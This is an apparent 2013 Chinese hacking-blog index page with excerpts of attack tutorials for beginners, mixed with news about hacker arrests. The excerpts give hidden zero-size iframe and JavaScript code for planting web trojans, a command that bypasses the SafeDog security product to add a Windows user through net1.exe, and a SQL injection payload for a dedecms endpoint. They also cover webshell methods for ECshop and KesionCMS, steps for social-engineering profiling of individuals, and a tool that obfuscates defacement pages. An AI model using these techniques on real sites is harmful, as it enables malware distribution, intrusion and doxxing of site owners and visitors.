• 一些常用的网页挂马代码

    一些常用的网页挂马代码
    一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 document.write(“<iframe width=’0′ height=’0′ src=’地址’></iframe>”); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三:js变形加密 <SCRIPT langu...阅读全文
    作者:qxz_xp | 发布:2013年10月18日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 入侵网站时用到的十种小方法

    入侵网站时用到的十种小方法
    1.例如我们的目标网址为“http://www.xxxx.cn/forum/index.php”那么我们把地址改为http://www.xxxx.cn/forum/index.PHP后再浏览看看是否存在页面,如果存在的话,则服务器所使用的系统为windows,如果显示不存在,则服务器很有可能使用的是*nix系统。   2. Ewebeditor编辑器拿站的新方法 Ewebeditor编辑器 大家应该是再熟悉不过的吧?我们找到后台登录的地方后,先用默认...阅读全文
    作者:qxz_xp | 发布:2013年10月18日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 分享个人的一些社工思路

    分享个人的一些社工思路
    分享本人的一些社工思路吧,社工是一个很强大的入侵方式,下面我就分享一下本人的社工思路吧。 1.baidu google 搜目标的QQ号 常用ID 电话号码等等与之有关的 (可以得到一些有用信息后在加以扩大搜索范围) 2.完成第1步时基本会出现一些有用信息比如:贴吧里可以得到 (IP地址  毕业学校 出生日期 爱好的游戏 邮件地址等等…贴吧是个好东西) 3.通过QQ空间 其它交友博...阅读全文
    作者:qxz_xp | 发布:2013年10月18日 | 分类:社工相关, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • ECshop商城系统后台拿webshell方法

    ECshop商城系统后台拿webshell方法
    之前,网上爆出了ecshop最新的0day .论坛里也有人直接给出了EXP 相信好多基友都拿了不少的站吧. 这几天正好有个朋友要我帮忙拿一个站 看了一下,ecshop的  直接用exp 爆出了用户名和密码.. 接下来 就该拿shell了 在网上搜了一下, 看到了不少拿shell的方法 都试了一下,但是没有一个成功的  应该是都补上了. 群里一朋友 给介绍了一个思路 试了一下  竟然成功了 不多说了   ...阅读全文
    作者:qxz_xp | 发布:2013年10月17日 | 分类:黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 台湾高二中学生2个月入侵1200多个网站

    台湾高二中学生2个月入侵1200多个网站
    许姓高二学生在被黑计算机,留下“V怪客”图样。 人民网10月17日电 据台湾《联合报》报道,台湾许姓高二学生二个月内骇入岛内外多所大学、政府机关及公司一千二百多个网站,还故意留下电影“V怪客”图像,昨天被警方依妨害计算机使用罪嫌函送法办。 许姓学生在网络上自称“灰帽黑客”,自诩为“网络自由斗士”;他表示很崇拜漫画改编的电影“V怪客”,侵入网站只是想提醒对方注意...阅读全文
    作者:qxz_xp | 发布:2013年10月17日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • 新版安全狗 添加账户存在绕过问题

    新版安全狗 添加账户存在绕过问题
    新版安全狗 4.0.05221 添加账户存在绕过问题 经测试发现, 1.安全狗只是针对c:\windows\system32\下的net.exe做了限制,net1.exe可以正常使用,使用方法为:c:\\windows\\system32\\net1.exe user 账户 密码 /ADD, 注意下,这里是双斜杠。。。单斜杠是无法使用的。。 2.安全狗貌似采用的是黑名单的方式,只是限制了net.exe,再其他目录下,将net.exe改名为任意名字,可继...阅读全文
    作者:qxz_xp | 发布:2013年10月15日 | 分类:黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 黑客经常入侵政府网站做黑色利益链

    黑客经常入侵政府网站做黑色利益链
    不仅是为炫耀技术,更为非法捞金  黑客频“入侵”政府网站 背后有条“黑金”利益链 日前,湖北省公安县计生局网站被网民发现涉黄,官方回应为“黑客攻击”,这一事件引发网民热议。原本是政府形象和信息公开的窗口,政府网站缘何越来越受黑客青睐?“中国网事”记者调查发现,政府网站已经不仅是黑客炫耀技术的舞台,利用网站漏洞进行“非法勾当”,竟催生出了一条分工明确、衔接紧密...阅读全文
    作者:qxz_xp | 发布:2013年10月14日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • 分享一款好用的黑页加密工具

    分享一款好用的黑页加密工具
    黑页加密工具截图: 这是一款网页加密工具,可对网页进行加密,可根据您的需求选择加密强度,分为: 最小,适中,较大,最大 如果各位想自己编写的黑页,不想让他人轻松盗走,可以使用此款软件对自己的黑页进行加密。 通过加密可以使您的网页html源码看上去就像一堆乱码,使您的网页资源不被窃取。 加密前的黑页: 加密后的黑页效果: 下载地址:http://pan.baidu.com/s/1...阅读全文
    作者:qxz_xp | 发布:2013年10月13日 | 分类:黑客工具, 黑客攻防 | 3条评论
    阅读全文

  • 网络中并没有想象中那么安全 Google马来西亚主页被黑

    网络中并没有想象中那么安全 Google马来西亚主页被黑
    TheVerge 消息,Google 马来西亚主页2小时前遭到黑客攻击,常见的Google 首页也被如上图片替代(现已恢复)。 尽管黑客近似炫耀的“声明”中带“巴基斯坦”字样,但此次攻击跟政治的关联并不大。MADLEETS 团队领导者Leet 对 TC 表示:“(黑Google 主页)其实很简单,就是想证明一下所谓的“安全”只是个假象,它根本不存在。” Madleets 团队也在其Facebook 主页中写到: 我们有必要提...阅读全文
    作者:qxz_xp | 发布:2013年10月11日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • 4名黑客团伙入侵偷4万 涉上海交大学生

    4名黑客团伙入侵偷4万 涉上海交大学生
    12小时内,沈阳一家通讯公司突然发现公司账户中4万多元被盗。   而在另一端,淘宝上却出现了远低于市场价的Q币疯狂销售。 沈河警方破获沈阳首例黑客入侵盗窃案,一个由网络黑客、淘宝店主等多人联合网上盗窃的黑色链条清晰可见。 四人黑客团伙里,有公司主管,还有重点大学大四学生。 客户账号被盗 嫌犯都不在沈阳 2013年3月25日上午9时许,沈阳一家通讯网络有限公司负责...阅读全文
    作者:qxz_xp | 发布:2013年10月11日 | 分类:业界新闻, 黑客攻防 | 1条评论
    阅读全文

  • 科讯kesioncms 5.5以下漏洞后台拿shell

    科讯kesioncms 5.5以下漏洞后台拿shell
    科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码,而认证码没有保存在数据库而是保存在asp文件中,所以在某种程度上增大了拿shell 的难度。下面就个版本拿shell 的方法做一总结。 KesionCMS V3.x和3.x以下版本 网上有0day工具不过没有具体原理,下面就讲一下手工拿shell的方法 关键字:in...阅读全文
    作者:qxz_xp | 发布:2013年10月11日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • dedecms(织梦系统)album_add.php sql注入漏洞

    dedecms(织梦系统)album_add.php sql注入漏洞
    dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的 漏洞需要会员,所以比较鸡肋啦 发表文章处,post表单的mtypesid可以注入 /dedecmsnew/member/album_add.php 注入POC: mtypesid=1′),(“‘”,’0′,’1367930810′,’p’,’0′...阅读全文
    作者:qxz_xp | 发布:2013年10月10日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文